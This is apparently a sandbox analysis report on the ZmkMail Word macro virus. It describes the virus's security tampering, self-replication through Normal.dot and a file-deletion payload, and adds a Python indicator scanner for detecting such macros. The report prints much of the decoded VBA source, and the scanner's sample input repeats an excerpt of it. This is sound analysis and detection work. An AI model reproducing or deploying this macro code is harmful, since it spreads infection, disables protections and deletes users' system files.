Verdict: MALICIOUS
Risk score: 180
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The document carries VBA macros with a Document_Open routine, the auto-execution hook that runs as soon as the file is opened in Word. Document_Open first lowers Word 2000's macro defences: if the value Level under HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security exists it is set to 1 (Low) through System.PrivateProfileString and the Macro > Security... menu item is disabled; otherwise it re-enables auto macros (WordBasic.DisableAutoMacros 0), sets Options.VirusProtection = False, suppresses the prompt to save Normal.dot, and disables the Cancel key so the macro cannot be interrupted. It then checks whether a module named ZmkMail already exists in the global template. If not, it exports its own module to C:\Mail.sys, imports that file into NormalTemplate's ThisDocument code module with AddFromFile, strips the attribute header, and appends stub FileTemplates, ToolsMacro and ViewVBCode subs; these override Word's built-in commands of the same names, so the Templates, Macro and Visual Basic Editor dialogs no longer open. If Normal.dot is already infected, it copies the module back into the current document (and saves it) when the document lacks it, then runs the payload branch. This is self-replicating macro-virus behaviour spreading through Normal.dot. Nothing in the visible code downloads or drops an executable, so "downloader or dropper" is not supported by the preview (the PayMail body is truncated). The payload is time-gated: when the clock reads 12 it calls PayMail; otherwise it appends the text "1*1=1 2*2=4 3*3=9" to the end of the document and, when a 1-in-13 random draw hits 13 and the minute field reads "13", deletes C:\Autoexec.bat, C:\Config.sys, C:\msdos.sys and c:\io.sys. Note that TMin$ = Mid(MyTime, 4, 5) returns the whole "MM:SS" tail rather than the minute, so TMin$ can never equal a two-character string and the file-deletion branch is effectively unreachable; PayMail fires when the hour is 12 (or, on locales whose Time string is exactly HH:MM:SS, when the second is 12). The ClamAV detections Win.Trojan.Psycho-3 (on the document) and Doc.Trojan.Zmk-9 (on the extracted macro source) agree with this assessment. Replication through VBProject requires programmatic access to the VBA project, which current Office versions deny unless "Trust access to the VBA project object model" is enabled, and the registry path is specific to Office 2000, so a modern Word install is unlikely to be infected, but the document should still be treated as malicious.
Heuristics (3)
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro present
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17083 bytes | 695f6152b6417fb7bcb6a8e1ca349cb2c0314778c9953d9fbd30fa3c99e0202f | ClamAV: Doc.Trojan.Zmk-9 | unlikely |
Script preview (first 1,000 lines of the extracted script; the listing below is truncated)
Attribute VB_Name = "ZmkMail"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error GoTo ErrorDocOpen
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = False
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    Else
        Application.EnableCancelKey = wdCancelDisabled
        WordBasic.DisableAutoMacros 0
        Options.VirusProtection = False
        Options.SaveNormalPrompt = False
    End If
    Dim MyTime, COL, COLTemp, NumRnd
    MyTime = Time
    NumRnd = Int(Rnd * 13) + 1
    THeur$ = Mid(MyTime, 1, 2)
    TMin$ = Mid(MyTime, 4, 5)
    TSec$ = Mid(MyTime, 7, 8)
    iMacroNormalTempCount = NormalTemplate.VBProject.VBComponents.Count
    For i = 1 To iMacroNormalTempCount
        If NormalTemplate.VBProject.VBComponents(i).Name = "ZmkMail" Then
            ZmkMailNormInstalled = -1
        End If
    Next i
    If Not ZmkMailNormInstalled Then
        ActiveDocument.VBProject.VBComponents("ZmkMail").Export "C:\Mail.sys"
        NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\mail.sys"
        NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.DeleteLines 1, 4
        COLTemp = NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.CountOfLines
        NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 1, "Sub FileTemplates()"
        NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 2, " Application.EnableCancelKey = wdCancelDisabled"
        NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 3, "End Sub"
        NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 4, "Sub ToolsMacro()"
        NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 5, " Application.EnableCancelKey = wdCancelDisabled"
        NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 6, "End Sub"
        NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 7, "Sub ViewVBCode()"
        NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 8, " Application.EnableCancelKey = wdCancelDisabled"
        NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 9, "End Sub"
    Else
        iMacroDocuCount = ActiveDocument.VBProject.VBComponents.Count
        For i = 1 To iMacroDocuCount
            If ActiveDocument.VBProject.VBComponents(i).Name = "ZmkMail" Then
                ZmkMailDocInstalled = -1
            End If
        Next i
        If Not ZmkMailDocInstalled Then
            NormalTemplate.VBProject.VBComponents("ZmkMail").Export "C:\Mail.sys"
            ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Mail.sys"
            ActiveDocument.VBProject.VBComponents("ZmkMail").CodeModule.DeleteLines 1, 4
            COL = ActiveDocument.VBProject.VBComponents("ZmkMail").CodeModule.CountOfLines
            ActiveDocument.VBProject.VBComponents("ZmkMail").CodeModule.DeleteLines COL - 8, 9
            ActiveDocument.Save
        End If
        If (THeur$ = "12") Or (TMin$ = "12") Or (TSec$ = "12") Then
            Call PayMail
        Else
            Selection.EndKey Unit:=wdStory
            Selection.TypeParagraph
            Selection.TypeText "1*1=1 2*2=4 3*3=9"
            If (NumRnd = 13) And (TMin$ = "13") Then
                MsgBox "Clear Files", , "Microsoft Word"
                Kill "C:\Autoexec.bat"
                Kill "C:\Config.sys"
                Kill "C:\msdos.sys"
                Kill "c:\io.sys"
            End If
        End If
    End If
ErrorDocOpen:
End Sub
Private Sub PayMail()
    On Error GoTo ErrorPayMail
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = False
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\
... (truncated)
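The behaviours visible in the listing (a Document_Open hook, an assignment to the Office Word\Security registry value through PrivateProfileString, Options.VirusProtection = False, the disabled Security... menu item, the Export/AddFromFile round trip through the VBProject object model, and the Kill calls) can be turned into a static indicator scan over the decoded VBA that olevba writes out. The Python below is an added example, not part of this analyzer or of oletools: the rule names, regexes, severity weights and verdict thresholds are my own choices, and SAMPLE_VBA is a constructed excerpt modelled on the Document_Open routine above, not the full macros.bas artifact.

```python
"""Static indicator scan for the Word macro-virus behaviour shown in this report.

Added example, not part of the analyzer or of oletools. Feed it the decoded VBA
that olevba writes out (e.g. `olevba --decode sample.doc > macros.bas`).
"""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass

# Constructed excerpt modelled on the ZmkMail Document_Open routine above.
# It is sample input for the scanner, not the full extracted macros.bas.
SAMPLE_VBA = r'''Attribute VB_Name = "ZmkMail"
Private Sub Document_Open()
On Error GoTo ErrorDocOpen
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = False
End If
ActiveDocument.VBProject.VBComponents("ZmkMail").Export "C:\Mail.sys"
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\mail.sys"
Kill "C:\Autoexec.bat"
Kill "C:\Config.sys"
ErrorDocOpen:
End Sub
'''

# (rule name, severity, pattern). VBA is case-insensitive, so every pattern is too.
# Line-anchored rules use [ \t]* rather than \s* so a match never starts on an
# earlier blank line, which would throw the reported line number off.
RULES: list[tuple[str, str, re.Pattern[str]]] = [
    # Auto-execution hooks that run with no user action beyond opening the file.
    ("auto_exec_document_open", "high", re.compile(
        r'^[ \t]*(?:Private[ \t]+|Public[ \t]+)?Sub[ \t]+'
        r'(?:Document_Open|AutoOpen|Document_Close|AutoClose|AutoExec)\b', re.I | re.M)),
    # An assignment (not merely a read) to the Office ...\Word\Security registry value.
    ("macro_security_registry_write", "critical", re.compile(
        r'PrivateProfileString[ \t]*\(.*?\\Office\\[\d.]+\\\w+\\Security.*?\)[ \t]*=', re.I)),
    ("virus_protection_disabled", "critical", re.compile(
        r'Options\.VirusProtection[ \t]*=[ \t]*False', re.I)),
    ("security_menu_disabled", "high", re.compile(
        r'CommandBars[ \t]*\([ \t]*"Macro"[ \t]*\)\.Controls[ \t]*\([ \t]*"Security\.\.\."[ \t]*\)'
        r'\.Enabled[ \t]*=[ \t]*False', re.I)),
    # Export / AddFromFile through the VBProject object model: a module copying
    # itself between the document and the global template.
    ("vbproject_self_replication", "critical", re.compile(
        r'VBProject\.VBComponents[ \t]*\(.*?\)\.(?:Export|CodeModule\.AddFromFile)\b', re.I)),
    ("normal_template_modified", "high", re.compile(r'NormalTemplate\.VBProject', re.I)),
    ("destructive_file_delete", "high", re.compile(r'^[ \t]*Kill[ \t]+"', re.I | re.M)),
    ("cancel_key_disabled", "medium", re.compile(
        r'EnableCancelKey[ \t]*=[ \t]*wdCancelDisabled', re.I)),
]

WEIGHTS = {"critical": 40, "high": 20, "medium": 10}


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line: int
    text: str


def scan_vba(source: str) -> list[Finding]:
    """Return one Finding per rule hit, with the 1-based line it occurred on."""
    lines = source.splitlines()
    findings: list[Finding] = []
    for rule, severity, pattern in RULES:
        for match in pattern.finditer(source):
            line_no = source.count("\n", 0, match.start()) + 1
            findings.append(Finding(rule, severity, line_no, lines[line_no - 1].strip()))
    return sorted(findings, key=lambda f: f.line)


def score(findings: list[Finding]) -> int:
    """Weight each distinct rule once, so repeated Kill lines do not inflate the total."""
    per_rule = {f.rule: WEIGHTS[f.severity] for f in findings}
    return sum(per_rule.values())


def verdict(findings: list[Finding]) -> str:
    rules = {f.rule for f in findings}
    has_critical = any(f.severity == "critical" for f in findings)
    if "auto_exec_document_open" in rules and has_critical:
        return "malicious"   # runs on open and tampers with security or replicates
    if findings:
        return "suspicious"  # e.g. a Document_Open that only shows a MsgBox
    return "clean"


if __name__ == "__main__":
    src = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_VBA
    hits = scan_vba(src)
    for f in hits:
        print(f"{f.severity:8} L{f.line:<4} {f.rule:32} {f.text[:70]}")
    print(f"score={score(hits)} verdict={verdict(hits)}")
```

Run without arguments it scans the constructed excerpt and reports ten hits across all eight rules; pass the path of an olevba-decoded macros.bas to scan a real extraction. The registry rule deliberately requires a trailing `=` so that the `If ... <> ""` read on the line before the write does not count as tampering, and the score counts each rule once, so a sample with four Kill lines scores the same as one with two.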